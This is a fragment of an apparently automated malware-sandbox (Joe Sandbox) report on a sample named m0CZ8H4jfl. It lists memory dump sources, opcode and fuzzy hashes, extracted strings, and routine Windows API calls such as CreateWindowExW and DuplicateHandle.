                                                                                                          • Snapshot File: hcaresult_3_2_34740000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: r4
                                                                                                          • API String ID: 0-1360354054
                                                                                                          • Opcode ID: 514097bffad3a2d75219a237c9a17f3e97f503bf31a1aadbf575bf21989e3034
                                                                                                          • Instruction ID: 6549e86329dc0054033fef900cd3ed763b7f4fdb1e2125e47dfd3901d4750b12
                                                                                                          • Opcode Fuzzy Hash: 514097bffad3a2d75219a237c9a17f3e97f503bf31a1aadbf575bf21989e3034
                                                                                                          • Instruction Fuzzy Hash: AAA1F474900258CFEB14DFA5C984BEDBBB1FF89304F208269E408AB391DB759985CF54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2659854188.0000000034740000.00000040.00000800.00020000.00000000.sdmp, Offset: 34740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_34740000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: r4
                                                                                                          • API String ID: 0-1360354054
                                                                                                          • Opcode ID: cdb7b484eca66765cb7e4b8300bb6acf0dd6abfa830083ad2b1cc9469db0648e
                                                                                                          • Instruction ID: 13105863d8e5168690ce3b2d5425090cf4170b4a1f264d31e7eebedfb7e27d34
                                                                                                          • Opcode Fuzzy Hash: cdb7b484eca66765cb7e4b8300bb6acf0dd6abfa830083ad2b1cc9469db0648e
                                                                                                          • Instruction Fuzzy Hash: 47A1F270D002088FEB14DFA9C944BADBBB1FF88305F208269E418AB391DB759985CF54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0^z4
                                                                                                          • API String ID: 0-1126777294
                                                                                                          • Opcode ID: 63fce66ab8c6366574669cfa5599b1e4869fd415c4e4e90d86de86fe31cb707e
                                                                                                          • Instruction ID: 085aee038bcde44306a6a4f11ee4750e4e25d0f1c1a12dfcf1611f5a087f795d
                                                                                                          • Opcode Fuzzy Hash: 63fce66ab8c6366574669cfa5599b1e4869fd415c4e4e90d86de86fe31cb707e
                                                                                                          • Instruction Fuzzy Hash: 6CA191B4E052288FEB58CF6AC944B9DBBF2BF89300F14C1AAD408A7251DB745A85CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0^z4
                                                                                                          • API String ID: 0-1126777294
                                                                                                          • Opcode ID: fa49f112370823f8c3a47aff643c6914d9d7ea2672015bfb7f15db0e1d736967
                                                                                                          • Instruction ID: 7fe4d2d88fd36db11a39d0e6ec926a724c839a134b5d80bacc5147f588d6335b
                                                                                                          • Opcode Fuzzy Hash: fa49f112370823f8c3a47aff643c6914d9d7ea2672015bfb7f15db0e1d736967
                                                                                                          • Instruction Fuzzy Hash: 69A191B4E01228CFEB18CF6AC944B9DBBF2BF89300F14C1AAD508A7255DB745A85CF55
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0^z4
                                                                                                          • API String ID: 0-1126777294
                                                                                                          • Opcode ID: 0ed71232052d19c3e7d387d589ee1b2c2304168a7b2bf9678264597d18afd1b2
                                                                                                          • Instruction ID: e720116569fdf2de70ae36c4b819f69ce92685b93ad79fba6ed5d3d070b374af
                                                                                                          • Opcode Fuzzy Hash: 0ed71232052d19c3e7d387d589ee1b2c2304168a7b2bf9678264597d18afd1b2
                                                                                                          • Instruction Fuzzy Hash: BEA172B5E052288FEB58CF6AC944B9DBBF2BF89300F14C1AAD408A7255DB345A85CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0^z4
                                                                                                          • API String ID: 0-1126777294
                                                                                                          • Opcode ID: 727e6c997e6cb2067093bff0dd0f9b45292db96381ab89e4bbf2a7cabac59cd1
                                                                                                          • Instruction ID: f63707ece9d0d900d9696f0700b5f560e3ffae76875adc4e8d583b2cb6054794
                                                                                                          • Opcode Fuzzy Hash: 727e6c997e6cb2067093bff0dd0f9b45292db96381ab89e4bbf2a7cabac59cd1
                                                                                                          • Instruction Fuzzy Hash: 5FA19474E012288FEB68CF6AC944B9DBBF2BF89300F14C1AAD508B7255DB745A85CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0^z4
                                                                                                          • API String ID: 0-1126777294
                                                                                                          • Opcode ID: bad575d65da982d7bc5bc52e7215bd703a5ea74d8c6c21d6a46c79db1365f1af
                                                                                                          • Instruction ID: 5ee1a2ff1eaa678a7f9bcae3bbb5f6d63a6d98c8d8fc7500cb2408a1ca86d474
                                                                                                          • Opcode Fuzzy Hash: bad575d65da982d7bc5bc52e7215bd703a5ea74d8c6c21d6a46c79db1365f1af
                                                                                                          • Instruction Fuzzy Hash: EB81A574E00618CFEB68CF6AC944B99BBF2AF89300F14C1AAD90CB7255DB745A85CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0^z4
                                                                                                          • API String ID: 0-1126777294
                                                                                                          • Opcode ID: b7ea3751136dd03484de1d82fc59fcbbcdc70cd66b44a575d18c121a789e1583
                                                                                                          • Instruction ID: 75bafe98d615a6c3053daddd5ed81c2374f6ebe2caedbff9fcc018d46ca5046e
                                                                                                          • Opcode Fuzzy Hash: b7ea3751136dd03484de1d82fc59fcbbcdc70cd66b44a575d18c121a789e1583
                                                                                                          • Instruction Fuzzy Hash: 307183B5E05628CFEB58CF66C944B9EBBF2AF89300F14C1AAD40CA7255DB344A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7097297ac0ece6a9b68ae69cb626d6de1fc759913c1cbd28b9cff5a3d068949d
                                                                                                          • Instruction ID: 726d27f18a6a464d17cd8dac30f592bb2903592615b7c57bd7639a24e32f931c
                                                                                                          • Opcode Fuzzy Hash: 7097297ac0ece6a9b68ae69cb626d6de1fc759913c1cbd28b9cff5a3d068949d
                                                                                                          • Instruction Fuzzy Hash: 77A27070604209DFCB15CF68C994AAEBBB2FF88311F158559E815DF261D730ED89CB61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 72c811cd1ef0fb2b0e568fea8df59fd5914f077c77ff2f69a215f59fcd1ce572
                                                                                                          • Instruction ID: d2c27b6b59918d1df5e2611f8f6de744f483d219e67e3280c842a05c0497086f
                                                                                                          • Opcode Fuzzy Hash: 72c811cd1ef0fb2b0e568fea8df59fd5914f077c77ff2f69a215f59fcd1ce572
                                                                                                          • Instruction Fuzzy Hash: 0A725170A00219DFDB14CFA9C954AAEBBB2FF88311F558159E815EB361DB30DD85CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 63c13d78c1d46a92000f2733edc421285814d0f42f2adeb59f642afeb66499dd
                                                                                                          • Instruction ID: ac3eae38c1dcc7cf7256bd5e00b4ab7b191ede17dfc4a24e718647a678c3b500
                                                                                                          • Opcode Fuzzy Hash: 63c13d78c1d46a92000f2733edc421285814d0f42f2adeb59f642afeb66499dd
                                                                                                          • Instruction Fuzzy Hash: FC72AD74E012688FEB64DF69C980BDDBBB6BF49301F5481EAD848A7251DB349E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 540ee8ee4b8e6b22d828a8f98471a99173658cf74c8e999694ce834b54daa72d
                                                                                                          • Instruction ID: decfd8fa1fe7638662804f8a2203447852db28d7da007736a18724bd12ce73f8
                                                                                                          • Opcode Fuzzy Hash: 540ee8ee4b8e6b22d828a8f98471a99173658cf74c8e999694ce834b54daa72d
                                                                                                          • Instruction Fuzzy Hash: FA1281B0801B458BE721CFA5ED4C2893BB6BB85328F504209D2696FAF1DBF415CADF44
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2659854188.0000000034740000.00000040.00000800.00020000.00000000.sdmp, Offset: 34740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_34740000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8885885ebbba2da961523d38c1b7762a752a90214e6832b663f58dcaef3efb7a
                                                                                                          • Instruction ID: 76a7c3be9dcc4c5a74197634bbb83959992d900be634195cc9aa5daba1006c37
                                                                                                          • Opcode Fuzzy Hash: 8885885ebbba2da961523d38c1b7762a752a90214e6832b663f58dcaef3efb7a
                                                                                                          • Instruction Fuzzy Hash: B2D1AF74E00218CFEB54DFA5D994BADBBB2FF89300F1081A9D809AB355DB359A81CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 475a4dbc054e698deea015a582ecf58f8f7896e43cbbd62586b68eb5a7be4967
                                                                                                          • Instruction ID: 757fc5f41f418c804adcd7a2222e3825af9f6b600d0c17b1d15d5f7d0276c493
                                                                                                          • Opcode Fuzzy Hash: 475a4dbc054e698deea015a582ecf58f8f7896e43cbbd62586b68eb5a7be4967
                                                                                                          • Instruction Fuzzy Hash: 81C1A274E00218CFEB14DFA5D994B9DBBB2BF89300F2091A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2659854188.0000000034740000.00000040.00000800.00020000.00000000.sdmp, Offset: 34740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_34740000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7825cde10048869173f87f76b3059058007aab15d5d0e22fd6d96afe2f82b328
                                                                                                          • Instruction ID: 479bc4d4a165f35df12078c712030202847ad7de0ac1c165a9f4cd65ae612952
                                                                                                          • Opcode Fuzzy Hash: 7825cde10048869173f87f76b3059058007aab15d5d0e22fd6d96afe2f82b328
                                                                                                          • Instruction Fuzzy Hash: F091D174900258CFEB10DFA9C988BECBBB1FF49311F208269E419AB391DB759985CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cbbad6e31bbaddca13c12d74ab9d8e3b25fb388d6cb302a11c55595c1b6eb9b1
                                                                                                          • Instruction ID: da35cb3720e0ccd90853a61bc17f99fecf1ec35211b6976f712476b526d64b22
                                                                                                          • Opcode Fuzzy Hash: cbbad6e31bbaddca13c12d74ab9d8e3b25fb388d6cb302a11c55595c1b6eb9b1
                                                                                                          • Instruction Fuzzy Hash: D381D374E00248CFEF18DFAAD98069DBBF2BF89311F248129D854BB359DB359942CB54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: daee25d512686261d1445a947d7d1bc1bc6059a97d79e9b15889590397a5392f
                                                                                                          • Instruction ID: 0368c7df8f355290a4f4c76a2b4211410e94ac957e0c009978c1458403650535
                                                                                                          • Opcode Fuzzy Hash: daee25d512686261d1445a947d7d1bc1bc6059a97d79e9b15889590397a5392f
                                                                                                          • Instruction Fuzzy Hash: 2F71A275D01228CFDB64CF6AD9847DDBBB2BF89301F1490AAD808B7260DB349A85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 52522bae991ddedfb4ca27a0aacbaf10c3080470e887a2f4af412f669ba97a7c
                                                                                                          • Instruction ID: 0783ffc48bb0f6fd3811f72566e6ef1c65a0adadc65b34ee44455f42667c5dfd
                                                                                                          • Opcode Fuzzy Hash: 52522bae991ddedfb4ca27a0aacbaf10c3080470e887a2f4af412f669ba97a7c
                                                                                                          • Instruction Fuzzy Hash: 95417AB1E016188BEB58CF6BC9457CAFBF7AFC9200F04C0AAC50CA6264DB740985CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f0385f896f04360656cc4d61230abf260e224bddc25151df25debd626bdc3960
                                                                                                          • Instruction ID: 357ce53e550f0579c2d5f6ed0876964cae211755d615fd3912ab88f9bdaa75c8
                                                                                                          • Opcode Fuzzy Hash: f0385f896f04360656cc4d61230abf260e224bddc25151df25debd626bdc3960
                                                                                                          • Instruction Fuzzy Hash: 624148B5D016188BEB58CF6BCD457CAFAF7AFC9304F04C1AAD50CA6264DB740A858F51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5785fbb44d8c5494fb06ade68e1f70e7ca77db42504b090d698f70ab374054d8
                                                                                                          • Instruction ID: 9378b597c4ea6240bb3b0549311a9a8917b41db9bf2bde954b7852e838001506
                                                                                                          • Opcode Fuzzy Hash: 5785fbb44d8c5494fb06ade68e1f70e7ca77db42504b090d698f70ab374054d8
                                                                                                          • Instruction Fuzzy Hash: 6C41E074E00248CFEF18CFAAD9546DEBBB6AF89300F24912AC814BB255DB355945CF54

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 37AF09FE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 37AF0A3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 37AF0A78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 37AF0AD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 11634e800df28f3bf6c3ace2635e6e5147e992e09a3b3396fc58fb7d37782299
                                                                                                          • Instruction ID: 249159616e56b736aecaef2ccb38b6f19d60117fa91bed35532ef244de08864c
                                                                                                          • Opcode Fuzzy Hash: 11634e800df28f3bf6c3ace2635e6e5147e992e09a3b3396fc58fb7d37782299
                                                                                                          • Instruction Fuzzy Hash: 745166B0901249CFDB54CFAAC944BEEBBF0AB88300F20845AE459BB361D7759940CF65

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 37AF09FE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 37AF0A3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 37AF0A78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 37AF0AD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 1b1ab3e416dea5c2ffd9c9774c94b046cfad61c8b23aab9402800d6b623c2b59
                                                                                                          • Instruction ID: d21d8c5a5a227d21247a762f7e8a2ec95a9e6485a8ace50ade346a1c0955f661
                                                                                                          • Opcode Fuzzy Hash: 1b1ab3e416dea5c2ffd9c9774c94b046cfad61c8b23aab9402800d6b623c2b59
                                                                                                          • Instruction Fuzzy Hash: 6C5146B0901209DFDB54DFAAC944BEEBBF1AF88310F208429E459B7351DB75A980CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 194 36ab7920-36ab7941 195 36ab7948-36ab797e 194->195 196 36ab7943 194->196 199 36ab7987-36ab79ae 195->199 196->195 201 36ab7b3d-36ab7b46 199->201 202 36ab79b4-36ab79cc 199->202 205 36ab7ae8-36ab7b03 202->205 207 36ab7b09-36ab7b2d 205->207 208 36ab79d1-36ab7ae7 205->208 207->201 208->205
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <Cz4$<Cz4$<Cz4
                                                                                                          • API String ID: 0-4031186689
                                                                                                          • Opcode ID: f62b548a677beff74f99018f95fa4120b0467761504d2fe9979d17ec22ef2908
                                                                                                          • Instruction ID: 1989a2bdf248bb0b3ad3624c114b77a45537a9ee4ef1a12a4354dac0cd4797f9
                                                                                                          • Opcode Fuzzy Hash: f62b548a677beff74f99018f95fa4120b0467761504d2fe9979d17ec22ef2908
                                                                                                          • Instruction Fuzzy Hash: 1251EE74D01218DFDB14DFA6D854AAEBBB2FF88305F208129D805BB390DB769A46DF40

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 775 37af01c8-37af0232 CreateWindowExW 777 37af023b-37af0273 775->777 778 37af0234-37af023a 775->778 782 37af0275-37af0278 777->782 783 37af0280 777->783 778->777 782->783 784 37af0281 783->784 784->784
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 37AF0222
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 716092398-4108050209
                                                                                                          • Opcode ID: a497728dd86cdba2d2cc93f3b68f23c426b6c666ab932f9ded4a88863b4aefb9
                                                                                                          • Instruction ID: 8b2ae5b4770ab431de210544da8c26342bc330a8aee968e51c046661c33179b6
                                                                                                          • Opcode Fuzzy Hash: a497728dd86cdba2d2cc93f3b68f23c426b6c666ab932f9ded4a88863b4aefb9
                                                                                                          • Instruction Fuzzy Hash: AC21CE7580020CEFEF01DF94D884ADEBBB5BF48314F208159F914AB260C7769845DF60

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 785 36ab7911-36ab7917 786 36ab791a-36ab793a 785->786 787 36ab793f-36ab7941 785->787 786->787 788 36ab7948-36ab797e 787->788 789 36ab7943 787->789 792 36ab7987-36ab79ae 788->792 789->788 794 36ab7b3d-36ab7b46 792->794 795 36ab79b4-36ab79cc 792->795 798 36ab7ae8-36ab7b03 795->798 800 36ab7b09-36ab7b2d 798->800 801 36ab79d1-36ab7ae7 798->801 800->794 801->798
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <Cz4$<Cz4
                                                                                                          • API String ID: 0-1458155573
                                                                                                          • Opcode ID: ee8fd40122517831c4358a831812417fa96cb832c7964f5820c3ddbcc2865440
                                                                                                          • Instruction ID: 745e70a3dd100f4a418fc6477bf0da61293593e8779fee8e53c6c6927a26ddf8
                                                                                                          • Opcode Fuzzy Hash: ee8fd40122517831c4358a831812417fa96cb832c7964f5820c3ddbcc2865440
                                                                                                          • Instruction Fuzzy Hash: 0731F170C013189BEB44CFA6D4487DEBBB6BF49305F50842AD815BB350DBB59A4ADF90

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1255 37af1dc0-37af1dfc 1257 37af1eac-37af1ecc 1255->1257 1258 37af1e02-37af1e07 1255->1258 1265 37af1ecf-37af1edc 1257->1265 1259 37af1e5a-37af1e92 CallWindowProcW 1258->1259 1260 37af1e09-37af1e40 1258->1260 1263 37af1e9b-37af1eaa 1259->1263 1264 37af1e94-37af1e9a 1259->1264 1268 37af1e49-37af1e58 1260->1268 1269 37af1e42-37af1e48 1260->1269 1263->1265 1264->1263 1268->1265 1269->1268
                                                                                                          APIs
                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 37AF1E81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallProcWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714655100-0
                                                                                                          • Opcode ID: 79bcf06d909accd5e7dd928bea3d1dbcbfc5b41f0afc34704798db249925154f
                                                                                                          • Instruction ID: cedfd4bacf5d47aca07da225995fe2a17a23aaace50727c1ec3121cd3942c464
                                                                                                          • Opcode Fuzzy Hash: 79bcf06d909accd5e7dd928bea3d1dbcbfc5b41f0afc34704798db249925154f
                                                                                                          • Instruction Fuzzy Hash: A74118B8900309DFDB14CF95C844BAABBF5FF88310F25C459E959AB321D775A841CBA1

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1276 37af0bc8-37af0c5c DuplicateHandle 1277 37af0c5e-37af0c64 1276->1277 1278 37af0c65-37af0c82 1276->1278 1277->1278
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37AF0C4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 2c3c338542b5dbe717f256410b33292da627070cd18bd3e840108a8d9a395b69
                                                                                                          • Instruction ID: 076b48658e0b357e57cc342e9f0fde7edd8d64ecde60cc10f192fc8aa2265a92
                                                                                                          • Opcode Fuzzy Hash: 2c3c338542b5dbe717f256410b33292da627070cd18bd3e840108a8d9a395b69
                                                                                                          • Instruction Fuzzy Hash: D221F8B59002099FDB10CFAAD984ADEFBF4EB48320F14841AE958A7310D375A945CF61

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1271 37af0bc5-37af0c5c DuplicateHandle 1272 37af0c5e-37af0c64 1271->1272 1273 37af0c65-37af0c82 1271->1273 1272->1273
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37AF0C4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 5e1bc89f7fe50f488c39de97735dbe9ef434fb5e85291f6f4948262a210a1d5b
                                                                                                          • Instruction ID: f8354a533af0aa2c27ebff9f5af8f4694e224e0c47028b604079ac90cd267c34
                                                                                                          • Opcode Fuzzy Hash: 5e1bc89f7fe50f488c39de97735dbe9ef434fb5e85291f6f4948262a210a1d5b
